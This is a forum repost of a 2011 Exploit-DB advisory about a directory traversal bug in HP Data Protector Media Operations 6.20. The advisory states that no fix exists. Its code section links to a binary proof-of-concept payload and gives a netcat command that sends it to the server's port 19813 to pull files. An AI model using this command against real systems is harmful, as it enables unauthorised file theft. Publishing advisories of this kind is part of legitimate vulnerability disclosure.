Exploit HP Data Protector Media Operations 6.20 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18077
Проверка EDB
  1. Пройдено
Автор
LUIGI AURIEMMA
Тип уязвимости
WEBAPPS
Платформа
WINDOWS
CVE
null
Дата публикации
2011-11-04
Код:
#######################################################################

                             Luigi Auriemma

Application:  HP Data Protector Media Operations
              http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920
Versions:     <= 6.20
Platforms:    Windows and others
Bug:          directory traversal
Exploitation: remote, versus server
Date:         03 Nov 2011 (found 06 Jul 2011)
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"HP data protection software reduces backup and recovery complexity and
cost by protecting virtual and physical applications—whether you have
one server or thousands."


#######################################################################

======
2) Bug
======


Directory traversal through opcode 0x10 which allows to download the
files in the partition where is installed the program.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/hpdpmedia_1.dat
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18077.dat

  nc SERVER 19813 < hpdpmedia_1.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
 
Источник
www.exploit-db.com

Похожие темы